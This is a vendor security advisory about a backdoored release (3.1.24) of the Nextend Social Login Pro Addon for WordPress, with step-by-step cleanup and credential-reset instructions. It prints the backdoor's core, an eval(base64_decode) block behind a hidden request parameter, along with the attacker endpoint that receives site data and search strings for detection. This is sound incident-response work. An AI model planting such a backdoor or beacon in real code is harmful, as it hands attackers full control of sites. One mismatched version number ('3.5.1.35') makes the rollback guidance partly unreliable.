Description

A security breach affected the update system responsible for distributing Nextend Social Login Pro Addon for WordPress. Unauthorized parties released a malicious version 3.1.24, which may have been installed on some websites.

Once detected, the issue was contained and a fixed version 3.1.25 was released.

⚠️ Important:

• Only the Pro Addon is affected
• The free version is NOT affected

Affected Versions

What the Malware Does

The malicious code in version 3.1.24 introduces a hidden backdoor.

It may:

• Allow remote code execution via HTTP requests:eval(base64_decode($_REQUEST['d']));
• Use a hidden trigger parameter:
  • _wpc_eval (with a hash check)
• Generate a secret key based on your site:md5(AUTH_KEY . DB_NAME)
• Send site information to an external server:
  • https://wpjs1.com/api/v3/register-agent
• Store a marker in the database:
  • _wpc_reg

⚠️ This malware does NOT create admin users, but it allows full remote control of the site.

🔄 Server Rollback

If you have an available backup point, we strongly recommend rolling back your server to a backup created before version 3.5.1.35.
The compromised update was released by the attacker on April 7, 2026. Due to time zone differences, it is safest to restore from a backup dated April 5, 2026 or earlier.
This ensures that any potentially malicious files are completely removed, as they were never present in the restored backup.

How to Roll Back

1. Log in to your server hosting provider’s dashboard
2. Look for a section related to backups, snapshots, or restore points
3. Find a backup created before version 3.1.24
4. Use the available restore/rollback option to restore that backup

Reset Your Credentials

After restoring your server, it is still recommended to regenerate your credentials as described below, as the attacker might have accessed them.

If you don’t have a backup, then proceed with the manual cleanup method described below.

🛠 Manual Cleanup Guide

Follow these steps if your site used version 3.1.24.

1. Put Site in Maintenance Mode

Restrict access during cleanup to prevent exploitation.

2. Create a Backup

Backup:

• Files
• Database

Mark it as infected backup.

3. Remove the Infected Plugin Completely

Delete the entire plugin directory:

wp-content/plugins/nextend-social-login-pro/

Then reinstall version 3.1.25.

⚠️ Do not leave any old files behind.

4. Verify No Backdoor Code Remains

If you inspect files manually, ensure the following malicious block is NOT present anywhere:

if(isset($_REQUEST['_wpc_eval']) && ... ){
    eval(base64_decode($_REQUEST['d']));
    exit;
}

Also search for:

• _wpc_eval
• wpjs1.com
• eval(base64_decode
• shell_exec

Remove any matches found.

5. Remove Malicious Database Entry

Open your database (wp_options table) and delete:

_wpc_reg

This is used by the malware to track infected sites.

6. Search Entire Site for Backdoors

Even though this variant is simpler, always verify full cleanup.

Search all files for:

• eval(base64_decode
• _wpc_eval
• wpjs1.com

Check especially:

• wp-content/
• themes/
• uploads/
• mu-plugins/

7. Reinstall WordPress Core (Recommended)

To be safe:

• Download WordPress from official source
• Replace all core files except:
  • wp-config.php
  • wp-content/uploads/

8. Clean up the wp-config.php

Check your wp-config.php  file.

Remove this constant if exists:

define('WP_CACHE_SALT', '<token>');

Change the WordPress Security Keys (Salts):

1. Generate new security keys here:https://api.wordpress.org/secret-key/1.1/salt/
2. Open your website’s wp-config.php    file
3. Replace the existing keys (AUTH_KEY, SECURE_AUTH_KEY, etc.) with the new ones ( please make sure you won’t add them twice, but you actually replace the existing salts with the new ones, as defining constants twice could causes errors )
4. Save the file

This will also log out all users and invalidate existing sessions.

9. Clean up the .htaccess

Check your .htaccess  file in the WordPress root folder and remove the comment if present:

# WPCacheSalt <token>

10. Reinstall Plugins and Themes

• Remove all plugins
• Reinstall only from trusted sources
• Remove unused or unknown plugins

11. Change All Passwords

Even if no admin user was created, assume compromise.

Change:

• WordPress admin passwords
• Hosting account
• FTP / SSH
• Database password

How to reset the WordPress admin passwords:

1. Log in to your WordPress dashboard: /wp-admin  
2. Go to Users → All Users (/wp-admin/users.php  )
3. For each user with the Administrator role:
   • Click Edit
   • Scroll down to the Account Management section
   • Click Set New Password (WordPress will generate a strong password automatically)
   • Click Update User to save

Tip: You can also use the “Send password reset” option so each administrator can set their own password securely.


Changing the Database password:

1. Please contact your hosting provider for guidance on how to change your WordPress database user password.
2. After changing it:
3. Open wp-config.php  
4. Update the value of this constant to the new password that you generated:
   define(‘DB_PASSWORD’, ‘your-new-password’);

Changing the FTP / SSH and Hosting account credentials:
Please contact your hosting provider for guidance on how to change these credentials.

12. Review Logs

Check:

• access logs
• admin activity

Look for:

• _wpc_eval requests
• unusual POST requests
• unknown access patterns

13. Verify Security Plugins

The malware could have disabled or modified the security plugins (e.g. Wordfence).

• Reinstall and re-enable them
• Run a full scan

14. Harden the Site

After cleanup:

• Enable 2FA for admin users
• Keep everything updated
• Use strong passwords
• Remove unused plugins

Summary

• Version 3.1.24 was malicious
• Version 3.1.25 is safe
• Version 3.1.23 and earlier are unaffected
• Only the Pro Addon is impacted
• Cleanup plugin does NOT fix this variant
• Manual cleanup is required

Final Recommendation

If version 3.1.24 was installed:

👉 Treat the site as compromised
👉 Perform full manual cleanup
👉 Reset all credentials